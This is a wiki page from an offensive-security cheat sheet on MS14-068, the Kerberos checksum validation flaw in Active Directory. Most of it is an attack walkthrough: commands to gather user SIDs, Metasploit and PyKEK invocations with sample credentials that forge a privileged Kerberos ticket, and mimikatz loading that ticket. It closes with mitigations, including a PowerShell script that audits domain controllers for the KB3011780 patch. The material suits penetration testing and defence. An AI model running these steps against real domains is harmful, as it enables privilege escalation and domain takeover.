InternalAllTheThings/docs/active-directory/CVE/MS14-068.md

## MS14-068 Checksum Validation

This exploit requires the target user's SID. You can obtain it remotely with rpcclient, or locally with WMI if you already have access to a domain-joined machine.

* RPCClient

  ```
  rpcclient $> lookupnames john.smith
  john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
  ```

* WMI

  ```powershell
  wmic useraccount get name,sid
  Administrator  S-1-5-21-3415849876-833628785-5197346142-500
  Guest          S-1-5-21-3415849876-833628785-5197346142-501
  Administrator  S-1-5-21-297520375-2634728305-5197346142-500
  Guest          S-1-5-21-297520375-2634728305-5197346142-501
  krbtgt         S-1-5-21-297520375-2634728305-5197346142-502
  lambda         S-1-5-21-297520375-2634728305-5197346142-1110
  ```

* PowerView

  ```powershell
  Convert-NameToSid high-sec-corp.local\krbtgt
  S-1-5-21-2941561648-383941485-1389968811-502
  ```

* netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid`

Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068

Generate a ticket with Metasploit or PyKEK.

* Metasploit: `auxiliary/admin/kerberos/ms14_068_kerberos_checksum`

  ```
  Name      Current Setting                                Required  Description
  ----      ---------------                                --------  -----------
  DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
  PASSWORD  P@ssw0rd                                       yes       The Domain User password
  RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
  RPORT     88                                             yes       The target port
  Timeout   10                                             yes       The TCP timeout to establish connection and read data
  USER      lambda                                         yes       The Domain User
  USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  ```

* PyKEK

  ```powershell
  # Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
  $ git clone https://github.com/SecWiki/windows-kernel-exploits
  $ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
  $ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
  $ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
  $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066-1105
    [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
    [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
    [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
    [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
    [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
    [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
    [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
    [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
    [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
  ```

Then use mimikatz to load the ticket.

```powershell
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```

## Mitigations

* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: `get-hotfix 3011780`
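The same KB3011780 check extended to every domain controller, as an added example that is not part of the original page. It assumes the ActiveDirectory RSAT module (`Get-ADDomainController`) and remote WMI access to each DC; the function name `Test-Ms14068Patch` is invented here.

```powershell
# Added example (not from the original page): report KB3011780, the MS14-068 fix,
# for every DC in the domain instead of relying on a one-off get-hotfix run.
# Assumes the ActiveDirectory RSAT module and remote WMI (RPC) access to each DC.
Import-Module ActiveDirectory

function Test-Ms14068Patch {
    foreach ($dc in Get-ADDomainController -Filter *) {
        $hostname = $dc.HostName
        # MS14-068 affected Windows Server 2003 through 2012 R2; later releases
        # shipped with the fix, so a missing KB entry on them is expected.
        $inScope = $dc.OperatingSystem -match 'Server 20(03|08|12)'
        if (-not $inScope) {
            $status = 'Not affected (OS released after MS14-068)'
        } else {
            try {
                # Get-HotFix reads Win32_QuickFixEngineering on the remote host;
                # filtering client-side avoids the "hotfix not found" error path.
                $fix = Get-HotFix -ComputerName $hostname -ErrorAction Stop |
                       Where-Object { $_.HotFixID -eq 'KB3011780' }
                $status = if ($fix) { "Patched ($($fix.InstalledOn))" } else { 'MISSING' }
            } catch {
                # Could not query the DC: report it, never assume it is patched.
                $status = "Unverified: $($_.Exception.Message)"
            }
        }
        [pscustomobject]@{
            DomainController = $hostname
            OperatingSystem  = $dc.OperatingSystem
            KB3011780        = $status
        }
    }
}

Test-Ms14068Patch | Format-Table -AutoSize
```

Treat any `MISSING` or `Unverified` row as a finding until it has been confirmed by another route, since an unreachable DC is exactly the one most likely to have missed patching.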

## References